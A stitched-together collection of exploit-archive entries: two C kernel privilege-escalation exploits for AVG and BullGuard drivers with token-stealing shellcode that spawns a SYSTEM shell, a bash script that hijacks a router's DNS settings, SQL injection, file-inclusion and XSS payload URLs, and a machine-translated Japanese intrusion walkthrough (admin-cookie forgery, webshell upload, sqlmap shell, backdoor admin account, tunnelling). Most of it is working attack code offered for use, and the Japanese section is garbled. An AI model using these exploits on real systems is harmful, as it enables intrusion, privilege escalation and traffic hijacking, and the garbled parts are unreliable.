0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc2,0x08 // ret 8 Away from the kernel
};
BYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable
"\xf2\xa3\x6f\x80" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation
"\xce\xa3\x6f\x80" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation
"\x0b\x46\x61\x80" // 8054ccc4 8061460b nt!xHalQueryBusSlots
"\x00\x00\x00\x00" // 8054ccc8 00000000
"\x4d\xac\x50\x80" // 8054cccc 8050ac4d nt!HalExamineMBR
"\x89\x6f\x5c\x80" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters
"\xe5\x4a\x5c\x80" // 8054ccd4 805c4ae5 nt!IoReadPartitionTable
"\x7b\x3f\x61\x80" // 8054ccd8 80613f7b nt!IoSetPartitionInformation
"\xef\x41\x61\x80" // 8054ccdc 806141ef nt!IoWritePartitionTable
"\x57\xd1\x52\x80"; // 8054cce0 8052d157 nt!CcHasInactiveViews
DWORD HalDispatchTableAddress()
{
_NtQuerySystemInformation NtQuerySystemInformation;
PSYSTEM_MODULE_INFORMATION pModuleInfo;
DWORD HalDispatchTable;
CHAR kFullName[256];
PVOID kBase = NULL;
LPSTR kName;
HMODULE Kernel;
FUNCTPTR Hal;
ULONG len;
NTSTATUS status;
NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
if (!status)
{
printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
return -1;
}
pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
if(pModuleInfo == NULL)
{
printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
memset(kFullName, 0x00, sizeof(kFullName));
strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
kBase = pModuleInfo->Module[0].Base;
printf("[i] Kernel base name %s\n", kFullName);
kName = strrchr(kFullName, '\\');
Kernel = LoadLibraryA(++kName);
if(Kernel == NULL)
{
printf("[-] Failed to load kernel base\n\n");
return -1;
}
Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
if(Hal == NULL)
{
printf("[-] Failed to find HalDispatchTable\n\n");
return -1;
}
printf("[i] HalDispatchTable address 0x%08x\n", Hal);
printf("[i] Kernel handle 0x%08x\n", Kernel);
printf("[i] Kernel base address 0x%08x\n", kBase);
HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);
printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);
if(!HalDispatchTable)
{
printf("[-] Failed to calculate HalDispatchTable\n\n");
return -1;
}
return HalDispatchTable;
}
int GetWindowsVersion()
{
int v = 0;
DWORD version = 0, minVersion = 0, majVersion = 0;
version = GetVersion();
minVersion = (DWORD)(HIBYTE(LOWORD(version)));
majVersion = (DWORD)(LOBYTE(LOWORD(version)));
if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP;
if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7";
if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003;
return v;
}
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtQueryIntervalProfile NtQueryIntervalProfile;
LPVOID input[1] = {0};
LPVOID addrtoshell;
HANDLE hDevice;
DWORD dwRetBytes = 0;
DWORD HalDispatchTableTarget;
ULONG time = 0;
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf(" AVG Internet Security 2015 (avgtdix.sys) Arbitrary Write EoP Exploit \n");
printf(" Tested on Windows XP SP3 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows XP\n");
}
if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not supported on this OS\n\n");
return -1;
}
sprintf(devhandle, "\\\\.\\%s", "avgtdi");
NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile)
{
printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
return -1;
}
addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(addrtoshell == NULL)
{
printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
return -1;
}
printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);
memset(addrtoshell, 0x90, BUFSIZE);
memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);
input[0] = addrtoshell; // input buffer contents gets written to our output buffer address
printf("[+] Input buffer contents %08x\n", input[0]);
printf("[~] Press any key to send Exploit . . .\n");
getch();
DeviceIoControl(hDevice, 0x830020f8, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
printf("[+] Buffer sent\n");
printf("[+] Spawning SYSTEM Shell\n");
NtQueryIntervalProfile(2, &time);
spawnShell();
printf("[+] Restoring Hal dispatch table pointers\n\n");
DeviceIoControl(hDevice, 0x830020f8, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
CloseHandle(hDevice);
return 0;
}
Advisory: SQL injection vulnerability in Pragyan CMS v.3.0
Advisory ID: SROEADV-2015-11
Author: Steffen Rösemann
Affected Software: Pragyan CMS v.3
Vendor URL: https://github.com/delta/pragyan, http://delta.nitt.edu/
Vendor Status: vendor did not respond after initial communication
CVE-ID: -
==========================
Vulnerability Description:
==========================
Pragyan CMS v. 3 suffers from a SQL injection vulnerability that can be
abused even by unauthenticated attackers.
==================
Technical Details:
==================
The user-profile of registered users of Pragyan CMS v.3 is vulnerable to
SQL injection attacks. A user-profile can be found in the following
location of a common Pragyan CMS installation:
http://{TARGET}/user:1
Exploit-Example:
http://
{TARGET}/user:1%27+and+1=2+union+select+database%28%29,version%28%29,3+--+
=========
Solution:
=========
Vendor notified, did not respond after initial communication.
If you use Pragyan CMS v.3, please locate the file userprofile.lib.php and
use my patch (see [5], usage at your own risk!).
====================
Disclosure Timeline:
====================
18-Jan-2015 – found the vulnerability
19-Jan-2015 - informed the developers (see [3])
19-Jan-2015 – release date of this security advisory [without technical
details]
19-Jan-2015 - forked the project to keep it available/researchable in its
current state for other researchers [4]
03-Feb-2015 - release date of this security advisory
03-Feb-2015 - provided a patch for vulnerability (see [5])
03-Feb-2015 - send to FullDisclosure
========
Credits:
========
Vulnerability found and advisory written by Steffen Rösemann.
===========
References:
===========
[1] http://delta.nitt.edu/ / https://github.com/delta/pragyan
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-11.html
[3] https://github.com/delta/pragyan/issues/206
[4] https://github.com/sroesemann/pragyan
[5] http://pastebin.com/ip2gGYuS
イントラネットローミングトポロジ図3
は、ログインバイパスの脆弱性を使用してバックエンドターゲットWebサイトIPを実行します。192.168.31.55、ターゲットWebサイトIPをローカルホストファイルの下でwww.test.comに結合します(IP Webサイトへの直接アクセスをIP Webサイトへの読み込みからの荷物Webサイトに訪問します。
クリック後、WebサイトがFoosuncmsによって構築されていることがわかりました。クリックした後、WebサイトがFoosuncmsによって構築されていることがわかりました。
バージョンはV2.0であり、悪用できる脆弱性があります。管理者アカウント情報の確認をバイパスし、背景を直接入力します。それは非常に危険なエクスプロイトであると言えます。 Webサイトのバックエンドアドレスにアクセスしてください:/Manage/index.aspx
検索では、Foosuncms v2.0にはログインバイパスの脆弱性があることがわかりました。バイパスをログインしてみてください。以下のリンクにアクセスして、usernumberを取得してください
http://www.test.com/user/city_ajax.aspx?cityid=1%27%20Union%20All%20Seerect%20Usernum、%20dbo.fs_sys_user%20where%20where%20username=%27admin 
正常に
SQLインジェクションを使用してusernumberを取得し、ユーザー名などでスプライスし、Cookieを構築し、管理者の特権で直接ログインします。 EXPコードは次のとおりです。
#Coding:UTF-8Import Argparseimport urllibimport tracebackimport base6444rom crypto.cipher import aesfrom binascii import b2a_hex ##############################################################################################################################################キーワード:#### inurl:/manage/login.aspx #############################################################(%hj7x89h $ yubi0456ftmat5fvhufcy76*h%(hilj $ lhj!yiv) 'e4ghj*ghg7!rnifb95guy86gfghub#er57hbh(u%g6hj($ jhwk7!hg4ui%$ hjk'def parse_args(): parser=argperse.argumentparser()parser.add_argument(' -u '' '' '' '' '' '' '' '' '-u' '' -u url '、必須=true、nargs='+')parser.parse_args()def run(url): try: usernumber=get_usernumber(url)usernumberがいない場合は: encrypt_cookie=generate_cookie(usernumber) Exception: traceback.print_exc()def get_usernumber(url): fullurl=url + '/user/city_ajax.aspx?cityid=1'すべての選択usernum、usernum、usernum from dbo.fs_sys_user where username='content " value=\ '')index!=-1: usernumber=content [index+15:] usernumber=usernumber [0: content.index( '\' ')+1] print' usernumber成功を取得します。 usernumberは: '、usernumber return usernumber else: print' get usernumber fail 'return nonedef pkcs7padding(data) orgstr='%s、admin、0,1、false'%(usernumber、)crypor=aes.new(key [0336032]、aes.mode_cbc、iv [0:16])ciphertext=cryptor.encrypt(pkcs7padding(orgstr))ciphertext(ciphertext) ciphertextdef write_cookie(url、ciphercookie): print 'generate cookie [siteinfo] :'、ciphercookie print 'Cookieを書いて、URL3360%s/manage s/manage/index.aspx'%(url、)if(url、)if __name __=============parse_args()try: if args.url is no no: run(args.url [0])例外を除いて、e: print 'python foosun_exp.py -u [url]' ''を実行した後、暗号化されたバイヤンスログインクッキーが正常に取得されました。
編集クッキーを使用して、スクリプトによってブラウザクッキーに印刷された暗号化されたクッキーを書き込む
次に、http://www.test.com/manage/index.aspxにアクセスして、背景を正常に入力します
注:EXPスクリプトの実行時に次の状況が発生した場合、Python crypto.cipher暗号化パッケージをインストールする必要があります
暗号化パッケージをインストールします
pipinstallpycryptodomeは、ファイルアップロードの脆弱性を使用してシェルを取得し、背景に入ります。コントロールパネルシステムパラメーター設定を入力した後、アップロードポイントでアップロードファイルを変更できることがわかり、ASPX形式を追加できます。
ファイルは、プラグインマネジメント広告システムにアップロードできます。
ASPXの1つのセンテンススクリプトをアップロードしてみてください。上にアップロードされたファイルパス
に正常にアップロードされて返されることがわかりました。
SQLMAPを使用してインタラクティブなシェルを取得し、上記の注入ポイントをSQLMAPに入れて実行してくださいhttp://www.test.com/user/city_ajax.aspx?cityid=1%27%20Union%20All%20Select%20USERNUM、%20DBO.FS_SYS_USER%20 WHERE%20USERNAME=%27Admin sqlmap shellsqlmap.py-u'http://www.test.com/user/city_ajax.aspx?cityid=1%27%20 yion%20all%20 select%20usernum、usernum%20 from%20dbo.fs_sys_user%20where%20usernameシステム許可は
SQLMAPを作成しようとするSQLMAPトロイの木馬(補足:脱出問題に注意を払う)複雑さが強化されます。ユーザーをもう一度追加すると、コマンドの実行が成功し、追加のユーザーが管理者グループ
USE SQLMAPインタラクティブシェルに追加されて、ホストIPが192.168.31.55ではなく192.168.1.123であることがわかります。次に、同じネットワークセグメントにないIPが同じネットワークセグメントに転送される可能性があります。
別のイントラネットに侵入してイントラネットをローミングするためにプロキシを設定します。チェックを通じて、ポート3389を開設し、以前に追加された管理者アカウントパスワードを使用して3389にログインすることがわかりました。 2つのアカウントパスワードを見つけた管理者管理者ユーザーのデスクトップにメモ帳があることがわかりました。
発見されたアカウントを使用して、www.test.comポート:8080のルーティングインターフェイスにログインして、IPログインを制限するポート:080のルーティングインターフェイスにログインします。イントラネットIPログインのみを設定できる可能性があると推測しました。
次に、ローカルでプロキシをセットアップした後、ログインしました。イントラネットルーティングWebサイトであることがわかりました。ルートにログインした後、ルーターの下に172.19.23.123のウェブサイトがあることがわかりました。
ここでは、KaliのRegeorge+Proxychains Proxyを使用して、イントラネット浸透を実行します。最初に、プロキシチェーンの構成ファイルを設定し、Kali端子を開き、次のコマンドを入力し、vi /etc/proxychains.conf 
のdynamic_chain#の前にコメント文字を削除します。 pythonregeorgsocksproxy.py-p23333-l0.0.0.0-uhttp://www.test.com/files/tunnel.aspx
プロキシを使用して、Firefoxブラウザを開きます。注:コマンドの前にproxychainsを追加=プロキシを使用してこのコマンドを実行しますproxychainsfirefox
上記で見つけたアカウントパスワードを使用して、Webサイトにログインしました。
は、このWebサイトがUメールであることを発見しました。非常に深刻なファイルのアップロード脆弱性がUメールで発生することがわかりました。このウェブサイトがこの脆弱性を修正したかどうかを試すことができます。 EXPコードは次のとおりです。MetaHTTP-Equiv='Content-Type' content='text/html; charset=utf-8 '/form name=form1 method=post action=' http://172.19.23.123/webmail/client/mail/index.php?module=operateactype=attach-upload 'enctype=multipart/form-dataの入力タイプ='ファイル構築されたHTMLページを開き、サフィックスJPGでPHPマレーシアをアップロードするためのプロキシ
アップロードが成功した後、ファイルfile_id情報が表示されます。
次のペイロードを使用して、3333338172.19.23.123の現在ログインしているユーザー_IDを取得します。アップロードされたマレーシアファイルパス、およびPHP解像度の脆弱性を使用します。パスが追加された後、 /.phpが追加された後、
要約
1。ターゲットシステムのWebポートにアクセスし、オンライン指紋認識を介してターゲットシステムのCMSシステムを照会してFOOSUNCMSに照会します。 Webサイトのバックグラウンドインジェクションの脆弱性には歴史的な脆弱性があり、バージョンはv2.0http://www.test.com2です。次のアドレスにアクセスして、管理者のusernumber3http://www.test.com/user/city_ajax.aspx?cityid=1%27%20union%20All20Select%20usernum %20from%20dbo.fs_sys_user%20どこにいてください。背景に直接アクセスするページhttp://www.test.com/manage/index.aspx4。 SQLインジェクションを直接使用してusernumberを取得し、ユーザー名などでスプライスし、Cookieを構築し、管理者の特権で直接ログインします。 EXPコードは次のとおりです。#Coding:UTF-8IMPORT ArgParseimport urllibimport tracebackimport base644rom crypto.cipher imp
/*
Exploit Title - BullGuard Multiple Products Arbitrary Write Privilege Escalation
Date - 04th February 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://www.bullguard.com/
Tested Version - 14.1.285.4
Driver Version - 1.0.0.6 - BdAgent.sys
Tested on OS - 32bit Windows XP SP3
OSVDB - http://www.osvdb.org/show/osvdb/114478
CVE ID - CVE-2014-9642
Vendor fix url - http://www.bullguard.com/about/release-notes.aspx
Fixed Version - 15.0.288.1
Fixed driver ver - 1.0.0.7
Note
----
Overwritten HAL dispatch table after exploit
kd> dps nt!HalDispatchTable l c
8054ccb8 00000003
8054ccbc 00340000
8054ccc0 00010000
8054ccc4 0a060002
8054ccc8 ee657645
8054cccc 00000001
8054ccd0 00000001
8054ccd4 867c1bf0
8054ccd8 80613f7b nt!IoSetPartitionInformation
8054ccdc 806141ef nt!IoWritePartitionTable
8054cce0 8052d157 nt!CcHasInactiveViews
8054cce4 804e42d1 nt!ObpTraceDepth+0x19
7 pointers get overwritten. Since input buffer is in our control and pointers
are static in XP I've triggered the overwrite again restoring the pointers.
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 4096
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
DWORD ProfileSource,
PULONG Interval);
typedef void (*FUNCTPTR)();
// Windows XP SP3
#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_xp[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc2,0x08 // ret 8 Away from the kernel
};
BYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable
"\xf2\xa3\x6f\x80" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation
"\xce\xa3\x6f\x80" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation
"\x0b\x46\x61\x80" // 8054ccc4 8061460b nt!xHalQueryBusSlots
"\x00\x00\x00\x00" // 8054ccc8 00000000
"\x4d\xac\x50\x80" // 8054cccc 8050ac4d nt!HalExamineMBR
"\x89\x6f\x5c\x80" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters
"\xe5\x4a\x5c\x80"; // 8054ccd4 805c4ae5 nt!IoReadPartitionTable
DWORD HalDispatchTableAddress()
{
_NtQuerySystemInformation NtQuerySystemInformation;
PSYSTEM_MODULE_INFORMATION pModuleInfo;
DWORD HalDispatchTable;
CHAR kFullName[256];
PVOID kBase = NULL;
LPSTR kName;
HMODULE Kernel;
FUNCTPTR Hal;
ULONG len;
NTSTATUS status;
NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
if (!status)
{
printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
return -1;
}
pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
if(pModuleInfo == NULL)
{
printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
memset(kFullName, 0x00, sizeof(kFullName));
strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
kBase = pModuleInfo->Module[0].Base;
printf("[i] Kernel base name %s\n", kFullName);
kName = strrchr(kFullName, '\\');
Kernel = LoadLibraryA(++kName);
if(Kernel == NULL)
{
printf("[-] Failed to load kernel base\n\n");
return -1;
}
Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
if(Hal == NULL)
{
printf("[-] Failed to find HalDispatchTable\n\n");
return -1;
}
printf("[i] HalDispatchTable address 0x%08x\n", Hal);
printf("[i] Kernel handle 0x%08x\n", Kernel);
printf("[i] Kernel base address 0x%08x\n", kBase);
HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);
printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);
if(!HalDispatchTable)
{
printf("[-] Failed to calculate HalDispatchTable\n\n");
return -1;
}
return HalDispatchTable;
}
int GetWindowsVersion()
{
int v = 0;
DWORD version = 0, minVersion = 0, majVersion = 0;
version = GetVersion();
minVersion = (DWORD)(HIBYTE(LOWORD(version)));
majVersion = (DWORD)(LOBYTE(LOWORD(version)));
if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP;
if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7";
if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003;
return v;
}
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtQueryIntervalProfile NtQueryIntervalProfile;
LPVOID input[1] = {0};
LPVOID addrtoshell;
HANDLE hDevice;
DWORD dwRetBytes = 0;
DWORD HalDispatchTableTarget;
ULONG time = 0;
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf(" BullGuard Multiple Products (bdagent.sys) Arbitrary Write EoP Exploit \n");
printf(" Tested on Windows XP SP3 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows XP\n");
}
if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not supported on this OS\n\n");
return -1;
}
sprintf(devhandle, "\\\\.\\%s", "bdagent");
NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile)
{
printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
return -1;
}
addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(addrtoshell == NULL)
{
printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
return -1;
}
printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);
memset(addrtoshell, 0x90, BUFSIZE);
memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
hDevice = CreateFile(devhandle, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);
input[0] = addrtoshell; // input buffer contents gets written to our output buffer address
printf("[+] Input buffer contents %08x\n", input[0]);
printf("[~] Press any key to send Exploit . . .\n");
getch();
DeviceIoControl(hDevice, 0x0022405c, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
printf("[+] Buffer sent\n");
printf("[+] Spawning SYSTEM Shell\n");
NtQueryIntervalProfile(2, &time);
spawnShell();
printf("[+] Restoring Hal dispatch table pointers\n\n");
DeviceIoControl(hDevice, 0x0022405c, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
CloseHandle(hDevice);
return 0;
}
#!/bin/bash
#
# Shuttle Tech ADSL Modem-Router 915 WM
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Warning:
# My first public report on such a serious
# vulnerability was ignored by the manufacturers
# and were committed serious criminal deeds of
# cybercriminals in Brasil. This vulnerability
# could affect millions of users worldwide.
# http://www.exploit-db.com/exploits/16275/
# http://securelist.com/blog/research/57776/the-tale-of-one-thousand-and-one-dsl-modems/
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Shuttle Tech ADSL Modem-Router 915 WM"
echo " Unauthenticated Remote DNS Change Exploit"
echo " ================================================================"
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
echo " http://www.ethical-hacker.org/"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
source: https://www.securityfocus.com/bid/48914/info
Trading Marketplace script is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/selloffers.php?cid=[SQL]
Exploit Title: Magento Server MAGMI Plugin Local File Inclusion And Cross Site Scripting
Software Link: http://sourceforge.net/projects/magmi/
Author: SECUPENT
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 5-2-2015
Exploit(Local file inclusion) :
http://{Server}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
Screenshot: http://secupent.com/exploit/images/magmilfi.jpg
Exploit(Cross Site Scripting):
1. http://{Server}/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
2. http://{Server}/magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
Screenshot 1:http://secupent.com/exploit/images/magmixss1.jpg
Screenshot 2: http://secupent.com/exploit/images/magmixss2.jpg
Thanks for read :)
Special Thanks: vulnerability.io, pentester.io, osvdb.org, exploit-db.com, 1337day.com, cxsecurity.com, packetstormsecurity.com and all other exploit archives, hackers and security researchers.
source: https://www.securityfocus.com/bid/48908/info
